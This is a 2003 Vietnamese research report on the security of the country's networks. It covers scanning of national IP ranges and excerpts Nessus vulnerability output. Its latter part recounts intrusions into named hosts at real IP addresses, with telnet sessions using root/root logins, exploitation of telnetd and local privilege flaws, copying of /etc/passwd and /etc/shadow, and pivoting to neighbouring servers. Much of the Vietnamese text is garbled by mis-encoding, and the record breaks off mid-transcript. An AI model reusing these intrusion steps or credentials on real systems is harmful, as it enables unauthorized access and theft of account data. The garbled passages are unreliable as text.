Đề tài Hỗ trợ bảo mật hệ thống thông tin cho các mạng tin học Việt Nam

Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 1 THÀNH PHỐ HỒ CHÍ MINH Tháng 12 năm 2003 ĐỀ TÀI NGHIÊN CỨU ỨNG DỤNG HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN CHO CÁC MẠNG TIN HỌC VIỆT NAM Báo cáo tổng quan Chủ nhiệm đề tài: Trịnh Ngọc Minh Cơ quan quản lý: Sở Khoa học và Công nghệ Cơ quan chủ trì: Trung tâm Phát triển Công nghệ thông tin – ĐHQG-HCM Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 2 BÁO CÁO TỔNG KẾT ĐỀ TÀI NGHIÊN CỨU “HỖ TRỢ BẢO MẬT HỆ THỐNG THÔNG TIN CHO CÁC MẠNG TIN HỌC VIỆT NAM” Thành phố Hồ Chí Minh ngày 9/12/2003 Thực hiện đề tài KS Phạm Hòang Bảo SaigonCTT CN Ngô Thư Chí Sao Bắc Đẩu KS Nguyễn Như Hảo ĐHQG-HCM CN Trương Thế Khôi SaigonCTT TS Trịnh Ngọc Minh ĐHQG-HCM CN Võ Hồng Minh Saigonctt CN Thái Nguyễn Hòang Nhã Cisco Việt nam CN Lê Minh Quốc SaigonCTT CN Nguyễn Hòang Sang SaigonCTT CN Nguyễn Kim Trang SaigonCTT SV Nguyễn Anh Tú SaigonCTT CN Đỗ Mạnh Tiến SaigonCTT Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 3 1 Hòan cảnh hình thành đề tài Cuối năm 1999, web site của ĐHQG-HCM bị cracker từ nước ngòai thay đổi bằng một nội dung phản động ! Đây là hồi chuông cảnh báo đầu tiên về khả năng bị tấn công từ ngòai vào mạng ĐHQG-HCM và giúp chúng ta cảnh tỉnh về trình độ còn rất non yếu của nhóm quản trị mạng ĐHQG-HCM về vấn để bảo mật hệ thống. Sớm nắm được mối hiểm nguy khi kết nối vào Internet và nhận thấy sự cần thiết phải nâng cao trình độ của cán bộ quản trị mạng, Lãnh đạo ĐHQG-HCM đã phê duyệt đề tài nghiên cứu trọng điểm cấp ĐHQG về “An tòan và bảo mật hệ thống thông tin”. Nội dung chính của đề tài là tìm hiểu các phương thức xâm nhập hệ thống của các hacker/cracker nhằm nâng cao trình độ quản trị mạng và tăng cường khả năng bảo mật cho các máy chủ. Ñeà taøi ñaõ ñöôïc trieån khai trong hôn moät naêm vaø ñöôïc nghieäm thu cuoái naêm 2001 vôùi keát quaû toát. Noäi dung chính cuûa ñeà taøi laø tìm hieåu caùc phöông thöùc xaâm nhaäp moät heä thoáng tin hoïc vaø ñeà ra moät soá phöông phaùp phoøng choáng nhö qui trình xaây döïng maùy chuû an toaøn, moät soá phöông phaùp phaùt hieän backdoor … Ñeà taøi cuûa ÑHQG chính laø böôùc chuaån bò kyõ thuaät cho pheùp trieån khai ñeà taøi ñang ñöôïc ñeà caäp. Vôùi nhöõng kieán thöùc, kyõ naêng veà tìm hieåu caùc sô hôû cuûa heä thoáng tích luõy töø ñeà taøi cuûa ÑHQG-HCM, chuùng ta coù theå tìm ra caùc sô hôû cuûa caùc maïng tin hoïc thoâng qua Internet, caûnh baùo caùc nhaø quaûn trò maïng thoâng qua caùc thoâng tin “naëng kyù” nhö thoâng baùo sô hôû vôùi nhöõng baèng chöùng nhö password cuûa admin, thoâng tin taøi khoaûn caù nhaân, khaû naêng thay ñoåi noäi dung Website … Töï bieát maïng tin hoïc cuûa mình sô hôû vaø töï söûa chöõa laø moät ñieàu raát khoù khaên. Vôùi hôn moät naêm nghieân cöùu vaán ñeà baûo maät heä thoáng cuûa moät soá maïng tin hoïc cuûa Vieät nam, keå caû caùc maïng ISP chuyeân nghieäp nhö VDC, FPT, SaigonNet, Netnam … chuùng toâi nhaän thaáy heä thoáng maïng cuûa chuùng ta coøn nhieàu sô hôû. Tuy nhieân bieát ñöôïc heä thoáng maïng cuûa mình bò taán coâng hoaëc ñaõ bò xaâm nhaäp laø moät vaán ñeà khoù khaên, thaäm trí nhieàu khi raát khoù khaên. Coù hai nguyeân nhaân chính gaây neân khoù khaên treân. Tröôùc tieân laø vaán ñeà kyõ thuaät, caùc xaâm nhaäp raát ña daïng, phong phuù vaø thay ñoåi nhanh do tieán boä khoâng ngöøng cuûa kyõ thuaät. Sau ñoù laø trình ñoä kyõ thuaät, yù thöùc veà nguy cô cuûa caùn boä quaûn trò heä thoáng ña phaàn coøn thaáp. Cuõng phaûi nhaän thaáy raèng baûo ñaûm moät heä thoáng phöùc taïp, nhieàu döõ lieäu quan troïng laø moät coâng taùc meät nhoïc vaø khoù khaên. Ngöôøi quaûn trò phaûi ñoïc nhieàu thoâng tin thoâng qua caùc taäp tin log, kieåm tra tính toaøn veïn caùc tieän ích quan troïng, theo doõi thoâng tin treân Internet, tham gia caùc forum veà security vaø xöû lyù caùc thoâng tin, thöôøng xuyeân naâng caáp caùc phaàn meàm vaù loã thuûng baûo maät, löu tröõ (backup) moät caùch heä thoáng… Coâng cuï hoã trôï thöïc söï laø caàn thieát ñoái vôùi coâng taùc naøy. Caàn thieát coù söï hoã trôï hoaøn toaøn mieãn phí vaø hieäu quaû cuûa Nhaø nöôùc ñoái vôùi caùc maïng tin hoïc coâng cuõng nhö tö nhaân. Hieän taïi chuùng ta cuõng ñaõ coù moät soá trung taâm hoaït ñoäng trong lónh vöïc naøy nhö VISC, trung taâm baûo maät heä thoáng Ñaïi hoïc Baùch khoa Haø noäi... Tuy nhieân thöïc teá cho thaáy ít ñôn vò naøo töï boû ra chi phí ñeå “nhôø” ñôn vò ngoaøi Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 4 xem laïi heä thoáng maïng cuûa mình khi chöùa thaáy hoaëc khoâng bieát maïng cuûa mình bò taán coâng. Vì vaäy söï hoã trôï mieãn phí ñeå caûnh baùo caùc maïng tin hoïc vaø trôï giuùp quyeát ñònh ñaàu tö saâu hôn laø thöïc söï caàn thieát. Ñaàu tö giuùp caùc ñôn vò tìm ra ñieåm yeáu cuûa mình laø hoã trôï thieát thöïc cho phaùt trieån ngaønh CNTT cuûa nöôùc ta. Nhöõng nhaø quaûn trò maïng caàn coù coâng cuï hoã trôï hieäu quaû cho pheùp phaùt hieän caùc xaâm nhaäp hoaëc yù ñònh xaâm nhaäp töø ngoaøi. Nhö ñaõ ñeà caäp ôû treân, phaùt hieän xaâm nhaäp laø moät baøi toaùn khoù vaø chuùng ta caàn coù nhöõng coâng cuï maïnh nhö heä thoáng phaùt hieän xaâm nhaäp Intrusion Detection System (IDS). Thöïc ra ñaây laø hoï goàm nhieàu caùc coâng cuï phaàn cöùng vaø phaàn meàm khaùc nhau. Nhoùm nghieân cöùu ñaõ tìm hieåu taøi lieäu, trieån khai thöû nghieäm, so saùnh tính naêng caùc heä thoáng khaùc nhau vaø ñöa ra caùc khuyeán caùo laø caàn thieát. 2 Mục tiêu của đề tài Với các phân tích như ở trên, mục tiêu chính của đề tài nhằm vào các vấn đề sau: a/ Tìm ra caùc sô sôû cuûa caùc maïng vôùi keát noái tröïc tieáp Internet cuûa Vieät nam b/ Thoâng baùo cho caùc maïng tin hoïc coù sô hôû loãi cuøng vôùi caùc minh chöùng. Cung caáp caùc phöông thöùc söûa chöõa nhö download giuùp caùc phaàn meàm vaù loãi, hoaëc chæ daãn caùc caáu hình söûa chöõa. Kieåm tra loãi sau khi ñaõ söûa chöõa. c/ Xaây döïng website vôùi möùc ñoä baûo maät cao. Coâng boá moâ hình Website vaø phöông thöùc xaây döïng cho pheùp caùc ñôn vò ñöôïc trieån khai mieãn phí d/ Nghieân cöùu so saùnh caùc coâng ngheä IDS cöùng vaø meàm. Ñöa ra caùc khuyeán caùo. 3 Các nội dung chính của đề tài a/ Khaûo saùt hieän traïng. Phaàn khaûo saùt hieän traïng seõ goàm 2 phaàn. Phaàn 1: Thu thaäp thoâng tin veà taát caû caùc maïng tin hoïc cuûa Vieät nam. Maïng tin hoïc Vieät nam laø nhöõng maïng tin hoïc maø ñieåm keát noái cuûa noù naèm sau caùc coång gateway cuûa Vieät nam. Noùi moät caùch kyõ thuaät, ñoù laø nhöõng maïng söû duïng heä thoáng ñòa chæ IP cuûa Internic caáp phaùt cho Vieät nam. Do ñoù, nhöõng maïng tin hoïc coù teân mieàn khoâng keát thuùc baèng .vn nhöõng ñöôïc truy caäp thoâng qua caùc IP cuûa Vieätnam seõ laø caùc ñoái töôïng nghieân cöùu. Caùc thoâng tin thu thaäp seõ bao goàm danh saùch caùc dòch vuï maø maïng ñoù cung caáp ra ngoaøi, caùc ñaëc ñieåm chuyeân bieät cuûa caùc dòch vuï, heä thoáng maùy chuû vaø caùc phaàn meàm töông öùng, caùc thieát bò maïng, ñaëc bieät laø caùc thieát bò lieân qua tôùi baûo maät. Caùc thoâng tin naøy seõ ñöôïc thu thaäp töø nhieàu nguoàn khaùc nhau nhö duøng coâng cuï khaûo saùt maïng, tra thoâng tin DNS, tra thoâng tin treân trang Web … Phaàn 2: Thu thaäp thoâng tin veà caùc sô hôû cuûa maïng cuøng caùc kyõ thuaät xaâm nhaäp môùi. Nhoùm nghieân cöùu caàn ñöôïc caäp nhaät caùc kieán thöùc veà caùc phieân baûn heä ñieàu haønh môùi Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 5 nhö Solaris 9, RedHat Linux 8, Windows Xp … cuøng vôùi caùc thoâng tin lieân quan tôùi caùc sô hôû môùi ñöôïc phaùt hieän. Caùc kyõ thuaät xaâm nhaäp quan troïng caàn ñöôïc trieån khai thöû nghieäm taïi caùc maïng tin hoïc maø nhoùm nghieân cöùu ñang laøm vieäc ñeå coù theå naém vöõng caùc kyõ thuaät naøy. Caùc phieân baûn môùi cuûa heä ñieàu haønh, cuûa trình dòch vuï … caàn ñöôïc caøi ñaët cho coâng taùc thöû nghieäm. Ngoaøi ra, nhoùm nghieân cöùu caàn phaân coâng nhau ñaêng kyù vaøo caùc forum chuyeân ngaønh, xöû lyù thoâng tin treân ñoù vaø tìm ra nhöõng thoâng tin môùi nhaát. b/ Xaây döïng Web site. Xaây döïng moät Website chuyeân bieät ñeå phuïc vuï ñeà taøi. Caùc kieán thöùc, coâng ngheä môùi nhaát veà baûo maät moät website seõ ñöôïc trieån khai. Heä thoáng coång thoâng tin iPortal, phöông thöïc xaùc thöïc LDAP, Radius, phöông thöùc keát noái an toaøn giöõa maùy chuû döõ lieäu vaø maùy chuû Web, caùc tieän ích phaùt hieän xaâm nhaäp … seõ ñöôïc trieån khai ñeå coù ñöôïc moät Web site an toaøn nhaát. Website naøy seõ laø ñoái töôïng ñaàu tieân vaø quan troïng nhaát cuûa nhoùm nghieân cöùu taán coâng thöû nghieäm. Ngoaøi ra, nhoùm nghieân cöùu seõ môøi roäng raõi nhöõng ngöôøi quan taâm tôùi baûo veä heä thoáng tin hoïc taán coâng thöû nghieäm Website naøy. c/ Nghieân cöùu vaø trieån khai thöû nghieäm IDS Hai coâng ngheä ñaõ ñöôïc nhoùm ñeà taøi nghieân cöùu laø thieát bò IDS cuûa haõng Cisco vaø phaàn meàm snort treân heä ñieàu haønh Linux hoaëc Sun Solaris. Caùc thieát bò/phaàn meàm naøy ñaõ ñöôïc trieån khai trong cuøng moät heä thoáng maïng vôùi Website bugsearch cuûa ñeà taøi nhaèm xem xeùt khaû naêng phaùt hieän xaâm nhaäp thöïc teá cuõng nhö xaâm nhaäp thöû nghieäm cuûa baûn thaân nhoùm ñeà taøi. Trong quaù trình trieån khai treân thöïc teá, nhoùm döï aùn ñaõ xem xeùt theâm Internet Security System – ISS. Ñaây laø moät saûn phaåm IDS raát maïnh, ñaày ñuû cuûa haõng Nokia, ñaõ ñöôïc böu ñieän Haø noäi vaø böu ñieän Tp HCM trieån khai cho 2 Trung taâm cung caáp dòch vuï Internet môùi cuûa mình. d/ Doø tìm sô hôû maïng Sau khi thöïc hieän thu thaäp thoâng tin thoâng qua khaûo saùt hieän traïng, nhoùm nghieân cöùu ñaõ trieån khai coâng taùc doø tìm caùc sô hôû. Coâng taùc tìm sô hôû phaûi thoûa maõn caùc tieâu chí sau: • Khoâng ñöôïc gaây baát cöù moät söï roái loaïn naøo, duø nhoû, trong hoaät ñoäng bình thöôøng cuûa maïng. • Khoâng ñöôïc laáy, söû duïng baát kyø baát kyø döõ lieäu naøo cuûa maïng nghieân cöùu • Caùc baèng chöùng veà sô hôû coù tính thuyeát phuïc cao, ñaëc bieät coù tính nghieâm troïng cuûa haäu quaû neáu bò xaâm nhaäp cho pheùp phuï traùch kyõ thuaät cuûa caùc heä thoáng maïng coù theå thuyeát phuïc laõnh ñaïo veà caùc ñaàu tö nhaèm taêng cöôøng an ninh cuûa maïng tin hoïc cuûa mình. • Trong tröôøng hôïp maïng ñaõ coù sô hôû, tìm kieám caùc backdoor coù theå coù do caùc cracker ñaõ laøm tröôùc ñoù. Ñaây laø moät noäi dung coù taàm quan troïng ñaëc bieät vì neáu maïng ñaõ coù sô hôû thì vôùi xaùc suaát cao laø maïng ñaõ bò xaâm nhaäp vaø bò caøi Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 6 backdoor. Caùc backdoor ñoù coù theå ñöôïc che daáu tính vi vaø thöïc söï nguy hieåm neáu khoâng phaùt hieän ñöôïc chuùng. Vôùi nhieàu heä thoáng, moät khi moät maùy coù backdoor thì taát caû caùc thieát bò, phaàn meàm baûo maät ñaét tieàn khaùc cuûa heä thoáng seõ bò voâ hieäu hoùa. e/ Nghieân cöùu caùc phöông phaùp baûo veä vaø ñaùnh giaù hieäu quaû. Sau khi phaùt hieän caùc sô hôû, ñaùnh giaù möùc ñoä nguy hieåm cuûa töøng sô hôû, nhoùm nghieân cöùu seõ xem xeùt caùc phöông thöùc baûo veä. Caùc giaûi phaùp baûo veä khaùc phuïc sô hôû seõ ñöôïc thoâng baùo chi tieát tôùi caùc maïng tin hoïc coù vaán ñeà. Trong khaû naêng cho pheùp, nhoùm nghieân cöùu seõ taûi veà vaø chuyeån giao caùc phaàn meàm caàn thieát cho ñoái töôïng nghieân cöùu cuøng vôùi caùc khuyeán caùo. f/ Ñaøo taïo vaø chuyeån giao coâng ngheä. Nhoùm nghieân cöùu seõ toå chöùc moät moät hoäi thaûo roäng raõi cho khoaûng 50 laõnh ñaïo vaø chuyeân vieân IT vaø moät lôùp taäp huaán cho 20 quaûn trò vieân maïng tin hoïc, ñaëc bieät laø cho caùc coâng ty ñaõ phoái hôïp chaët cheõ vôùi nhoùm nghieân cöùu, nhaèm naâng cao trình ñoä baûo veä heä thoáng cuûa caùc caùn boä quaûn trò maïng. Chi phí cuûa caùc hoaït ñoäng naøy ñaõ ñöôïc döï truø trong kinh phí cuûa ñeà taøi. 4 Các kết quả nghiên cứu đạt được 4.1 Khảo sát hệ thống địa chỉ IP cùng tên miền của các máy tính nối mạng Internet của Việt nam 4.1.1 Phương pháp khảo sát Lấy danh sách các tên miền của Việt nam. Hiện nay, các máy chủ tên miền của Việt nam không cho phép thực hiện chức năng list cho phép xem các record của tên miền. Vì vậy, nhóm triển khai phải sử dụng các nguồn thông tin thu thập từ nhiều nguồn khác nhau và được một danh sách như trong bảng sau. Phương pháp tiếp theo để thu thập các địa chỉ IP của Việt nam là thông qua các thông tin của Internic về các AS đã phân bổ cho Việt nam. Sử dụng thông tin này, chúng ta có được thông tin chính xác về các địa chỉ IP của Việt nam, nhưng sử dụng các địa chỉ này gặp khó khăn lớn là có rất nhiều địa chỉ chưa sử dụng và việc quét hết danh sách này tốn rất nhiều thời gian và đường truyền. Thêm nữa đa phần các địa chỉ IP của chúng ta không có phân giải ngược IP về tên miền nên nhiều khi nhóm dự án phát hiện sơ hở của máy chủ nhưng không xác định được máy chủ thuộc đơn vị/công ty nào. Nhóm dự án xây dựng một chương trình ngắn để phân giải ngược tự động các địa chỉ IP của Việt nam. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 7 4.1.2 Kết quả thực hiện được • Xác định rõ các địa chỉ IP của các mạng tin học Việt nam • Tổ chức “quét” (scan) số lượng lớn các địa chỉ IP của Việt nam nhằm tìm ra các sơ hở dựa trên các lỗi đã được công bố trên Internet. Đặc biệt, chúng tôi có quan tâm đặc biệt tới các địa chỉ của các mạng quan trọng như Webcity, VDC, SaigonNet, Netnam … Các kết quả trên được trình bày cụ thể trong các phần sau. 4.2 Tìm hiểu các dịch vụ triển khai trên các máy chủ của các mạng tin học Việt nam, Cơ sở dữ liệu các địa chỉ IP cùng với các thông tin về dịch vụ đang mở trên từng IP là rất quan trọng, cho phép chúng ta nhanh chóng xác định khả năng bị xâm nhập đối với một máy tính. Giả sử ta có được thông tin từ Internet về một kiểu sơ hở, ta có thể tìm trong cơ sở dữ liệu này địa chỉ IP có sơ hở tương ứng và nhanh chóng tiến hành xâm nhập thử nghiệm xem có thể hiện thực hóa xâm nhập được hay không. Theo thông tin từ APNIC, tổ chức quản lý Internet tại châu Á, Việt nam chúng ta có 3 vùng AS (Autonomous System) ( và khỏang 83456 IP Việc “quét” tòan bộ tất cả các IP trên là một công việc lớn và làm ảnh hưởng nhiều tới mạng của máy đi quét cũng như máy bị quét. Nhóm nghiên cứu đã phải tực hiện chủ yếu các thao tác này vào nghỉ cuối tuần và ban đêm. Chiến lược “quét” của chúng tôi là dò tìm tất cả các port trên một số mạng quan trọng, các IP quen biết và dò tìm một số cổng dịch vụ phổ biến cho các IP khác. Cụ thể là công tác dò tìm các port cơ bản được thực hiện cho „ 203.113.128.0 (8192) „ 203.160.0.0 (512) „ 203.161.0.0 (1024) „ 203.162.0.0 (4096) apnic VN asn 18403 1 20030103 allocated apnic VN asn 7552 1 20021008 allocated apnic VN asn 7643 1 19971014 allocated apnic VN ipv4 203.113.128.0 8192 20020904 allocated apnic VN ipv4 203.160.0.0 512 19940923 assigned apnic VN ipv4 203.161.0.0 1024 19950308 allocated apnic VN ipv4 203.162.0.0 2048 19950809 allocated apnic VN ipv4 203.162.128.0 4096 20010718 allocated apnic VN ipv4 203.162.144.0 4096 20021105 allocated apnic VN ipv4 203.162.16.0 4096 19981123 allocated apnic VN ipv4 203.162.160.0 8192 20021105 allocated apnic VN ipv4 203.162.32.0 8192 19981123 allocated apnic VN ipv4 203.162.64.0 16384 20010718 allocated apnic VN ipv4 203.162.8.0 2048 19981102 allocated apnic VN ipv4 203.210.128.0 16384 20021105 allocated apnic VN ipv4 210.245.0.0 8192 20020806 allocated Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 8 „ 203.162.16.0 (12288) „ 203.162.64.0 (32768) „ 203.210.128.0 (16384) „ 210.245.0.0 (8192) Tỷ lệ IP đã scan được khỏang 80 % của tòan bộ vùng IP trên. Dò tìm rộng các port từ 1 đến 65535 cho các vùng IP „ 203.162.0.0(4096) „ 203.162.17.0/24 „ 203.162.53.0/24 „ 203.162.57.0/24 „ 203.162.97.0/24 „ 203.113.131.0/24 Tỉ lệ IP đã scan của vùng này 11.35% Cùng với dò tìm các sơ hở một cách đại trà trên mạng, nhòm nghiên cứu cũng đã thực hiện việc phân giải tên của các IP để biết chủ sở hữu của các IP. Với một phần mềm nhỏ, nhóm nghiên cứu đã thử cho tất cả các địa chỉ IP nhưng chi phân giải được 783 địa chỉ, chiếm 0,94 %. Nguyên nhân của kết quả này là rất nhiều địa chỉ IP chưa sử dụng, địa chỉ IP dùng cho kết nối động qua dial-up, ADSL; IP dùng cho kết nối routers; và rất nhiều tên miền không có phân giải ngược IP-> tên trong Cơ sở dữ liệu DNS. Phụ lục B sao trính một phần các địa chỉ IP có tên miền tương ứng. Các tiện ích được sử dụng để tiến hành thăm dò các dịch vụ đang họat động trên một máy chủ là • Trên Windows: SuperScan (thích hợp khi cần scan nhanh) • Trên Unix: nmap, nessus Kết quả thăm dò các mạng khá dài (trên 2000 trang), do đó nhóm đề tài chỉ xin trích đoạn một số kết quả làm ví dụ: 203.113.142.14 Service Severity Description telnet (23/tcp) Info Port is open general/udp Low For your information, here is the traceroute to 203.113.142.14 : 192.168.20.2 192.168.20.2 192.168.20.2 203.113.142.14 telnet (23/tcp) Low An unknown service is running on this port. It is usually reserved for Telnet telnet (23/tcp) Low Remote telnet banner : User Access Verification Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 9 Password: general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to predict the next value of the ip_id field of the ip packets sent by this host. An attacker may use this feature to determine if the remote host sent a packet in reply to another request. This may be used for portscanning and other things. Solution : Contact your vendor for a patch Risk factor : Low general/tcp Low The remote host does not discard TCP SYN packets which have the FIN flag set. Depending on the kind of firewall you are using, an attacker may use this flaw to bypass its rules. See also : Solution : Contact your vendor for a patch Risk factor : Medium BID : 7487 general/tcp Low Remote OS guess : Cisco 801/1720 running 12.2.8 CVE : CAN-1999-0454 telnet (23/tcp) Low The Telnet service is running. This service is dangerous in the sense that it is not ciphered - that is, everyone can sniff the data that passes between the telnet client and the telnet server. This includes logins and passwords. You should disable this service and use OpenSSH instead. (www.openssh.com) Solution : Comment out the 'telnet' line in /etc/inetd.conf. Risk factor : Low Page 7 Network Vulnerability Assessment Report 05.08.2003 CVE : CAN-1999-0619 203.113.142.2 Service Severity Description telnet (23/tcp) Info Port is open telnet (23/tcp) Low The Telnet service is running. This service is dangerous in the sense that it is not ciphered - that is, everyone can sniff the data that passes between the telnet client and the telnet server. This includes logins and passwords. You should disable this service and use OpenSSH instead. (www.openssh.com) Solution : Comment out the 'telnet' line in /etc/inetd.conf. Risk factor : Low CVE : CAN-1999-0619 general/tcp Low The remote host does not discard TCP SYN packets which Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 10 have the FIN flag set. Depending on the kind of firewall you are using, an attacker may use this flaw to bypass its rules. See also : Solution : Contact your vendor for a patch Risk factor : Medium BID : 7487 general/udp Low For your information, here is the traceroute to 203.113.142.2 : 192.168.20.2 192.168.20.2 192.168.20.2 192.168.20.2 ? 192.168.20.2 192.168.20.2 192.168.20.2 203.113.142.2 general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to predict the next value of the ip_id field of the ip packets sent by this host. Page 8 Network Vulnerability Assessment Report 05.08.2003 An attacker may use this feature to determine if the remote host sent a packet in reply to another request. This may be used for portscanning and other things. Solution : Contact your vendor for a patch Risk factor : Low general/tcp Low Remote OS guess : Cisco X.25/TCP/LAT Protocol Translator ver 8.2(4) CVE : CAN-1999-0454 203.113.142.30 Service Severity Description telnet (23/tcp) Info Port is open telnet (23/tcp) Low The Telnet service is running. This service is dangerous in the sense that it is not ciphered - that is, everyone can sniff the data that passes between the telnet client and the telnet server. This includes logins and passwords. You should disable this service and use OpenSSH instead. (www.openssh.com) Solution : Comment out the 'telnet' line in /etc/inetd.conf. Risk factor : Low Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 11 CVE : CAN-1999-0619 general/tcp Low The remote host uses non-random IP IDs, that is, it is possible to predict the next value of the ip_id field of the ip packets sent by this host. An attacker may use this feature to determine if the remote host sent a packet in reply to another request. This may be used for portscanning and other things. Solution : Contact your vendor for a patch Risk factor : Low general/udp Low For your information, here is the traceroute to 203.113.142.30 : 192.168.20.2 192.168.20.2 203.113.142.30 telnet (23/tcp) Low A telnet server seems to be running on this port general/tcp Low Remote OS guess : Cisco 3600 running IOS 12.2(6c) CVE : CAN-1999-0454 Page 10 Network Vulnerability Assessment Report 05.08.2003 telnet (23/tcp) Low Remote telnet banner : User Access Verification Username: general/tcp Low The remote host does not discard TCP SYN packets which have the FIN flag set. Depending on the kind of firewall you are using, an attacker may use this flaw to bypass its rules. See also : Solution : Contact your vendor for a patch Risk factor : Medium BID : 7487 (Ngắt trích đọan ở đây …) 4.3 Các sai sót tìm thấy và có thể bị khai thác tại mạng tin học Việt nam Sau khi “quét” một cách hệ thống các địa chỉ IP của Việt nam và biết được các dịch vụ mà các máy tính đang sử dụng, nhóm đề tài lựa chọn và xâm nhập thử nghiệm các máy tính này. Kết quả thử nghiệm được trình bày ở phần sau. Với mỗi máy bị xâm nhập, chúng tôi cố gắng xác định chủ nhân của máy, miêu tả hệ điều hành, các lỗi mà qua đó ta có thể xâm nhập hệ thống và một số sao chép từ màn hình minh họa cho xâm nhập thành công của nhóm đề tài. Các màn hình minh học dạng copy màn hình khôg được in ở đây Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 12 vì quá dài. Nhóm dự án sẽ kèm theo những tập tin trên đĩa CDROM để minh họa khi cần thiết. Các thông tin liên quan tới sơ hở, đọan chương trình cho phép khai thác sơ hở (exploit code) được nhóm nghiên cứu tra cứu chủ yếu ở các website sau : 1) 203.162.57.227 (Suntest.vnnic.net) a. Hệ điều hành: Solaris 8 b. Hostname: Suntest c. Lỗi remote: i. Telnetd exploit trên Solaris cho các version 2.6, 2.7, 2.8 ii. Exploit code đã được công bố trên internet khá lâu iii. Dùng exploit code trên máy Linux từ xa có thể chiếm được shell với quyền của user bin d. Lỗi local i. priocntl exploit trên Solaris với cấu trúc lệnh 64 bit ii. Lỗi này cũng đã được thông báo trên internet iii. Khai thác thành công đem lại root shell iv. Kết quả: 1. tạo file /etc/.bugsearch 2. copy file /etc/passwd, /etc/shadow ( Exploit code, /etc/passwd,/etc/shadow và màn hình copy đính kèm ). 2) 203.162.53.51 ( Stelecom) Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 13 a. Hệ điều hành: Solaris 6.0 b. Hostname: hrl (local hostname), local IP # /usr/sbin/ifconfig -a lo0: flags=849 mtu 8232 inet 127.0.0.1 netmask ff000000 pnet0: flags=863 mtu 1500 inet 10.1.11.11 netmask ffffff00 broadcast 10.1.11.255 ether 8:0:20:a5:d7:82 pnet1: flags=863 mtu 1500 inet 10.1.11.14 netmask ffffff00 broadcast 10.1.11.255 ether 8:0:20:a5:d7:83 c. Lỗi remote: Telnetd, mật khẩu yếu - Xâm nhập thành công qua 2 user: hrl và oms, user root không login từ xa được. - Có thể khai thác lỗi của telnetd và chiếm được remote shell dưới quyền user bin d. Lỗi local - Thử su và dò thành công password root - Có thể khai thác lỗi local xlock overflow e. Các server lân cận bị khai thác i. oms1.lgic.co.kr (10.1.11.12) 1. hostname: oms1 2. local IP: 10.1.11.12 3. hệ điều hành: Solaris 7 oms1# /usr/sbin/ifconfig -a lo0: flags=849 mtu 8232 inet 127.0.0.1 netmask ff000000 hme0: flags=863 mtu 1500 inet 10.1.11.12 netmask ffff0000 broadcast 10.1.255.255 ether 0:3:ba:9:3a:a2 oms1# Từ máy hrl chỉ cần telnet sang máy oms1 với user root, passwd root: # telnet oms1.lgic.co.kr Trying 10.1.11.12... Connected to oms1.lgic.co.kr. Escape character is '^]'. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 14 SunOS 5.7 welcome to oms1 don't work other jobs login: root Password: Sun Microsystems Inc. SunOS 5.7 Generic October 1998 You have new mail. oms1# w 1:15pm up 103 day(s), 2:48, 2 users, load average: 0.02, 0.02, 0.02 User tty login@ idle JCPU PCPU what oms console 20Jun03103days /usr/dt/bin/sdt_shell -c unseten oms pts/3 16Sep0315days /bin/csh oms pts/7 Sun 7pm 27:55 telnet hlr oms pts/8 9:42am 3:14 telnet hlr root pts/9 1:15pm w oms1# ii. oms2.lgic.co.kr (10.1.11.13) 1. hệ điều hành: Solaris 7 2. Local IP: 10.1.11.13 Từ máy hrl hay oms1 chỉ cần telnet đến oms2 với user root, passwd root là ta có được quyền admin trên máy này. iii. IWM (10.2.105.21) 1. local hostname: IWM 2. Local IP: 10.2.105.21 3. Hệ điều hành: Solaris 6 4. Lỗi remote: telnetd Từ máy oms2 dùng lệnh arp –a để tìm các máy lân cận, ta thấy có máy IWM, thử telnet với các user trên các máy đã xâm nhập được và các passwd đơn giản nhưng không thành công. Lấy file binary dùng để khai thác lỗi telnetd từ máy của ta vào máy hrl ( vì không biên dịch được trên các server này). Từ shell ta thực thi file này và chiếm được user bin trên máy IWM. 5. Lỗi local - Khai thác lỗi xlock giống như máy hrl nhưng không thành công. - Với quyền của user bin có thể xem được file /etc/passwd. Ta thấy trong máy này không có nhiều user, chỉ có user common là có thể tận dụng được, thử su từ bin sang common và dò password nhưng không thành công. - Thoát khỏi IWM và quay lại hrl, thực hiện lại file khai thác lỗi telnetd với user là common, thành công, ta có được shell với quyền của user common. Thử lệnh su ta được ngay quyền root mà không cần passwprd. 3) 203.162.53.52 ( Stelecom) a. Hệ điều hành: Solaris 7 b. Hostname: ho_eipa Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 15 c. Local IP: 10.1.120.11 - 10.1.110.21 d. Lỗi remote: Telnetd với password đơn giản Có thể telnet vào máy này bằng user root và password root. [root@bugsearch hao]# telnet 203.162.53.52 Trying 203.162.53.52... Connected to 203.162.53.52 (203.162.53.52). Escape character is '^]' SunOS 5.7 +====================================================+ +==== ====+ +==== WELCOME to Hochiminh eip_A ====+ +==== ====+ +====================================================+ login: root Password: Last login: Mon Sep 29 13:47:47 from hanoi_eipa Sun Microsystems Inc. SunOS 5.7 Generic October 1998 You have mail. ho_eipa# w 1:59pm up 77 day(s), 13:43, 8 users, load average: 0.04, 0.04, 0.04 User tty login@ idle JCPU PCPU what eip pts/0 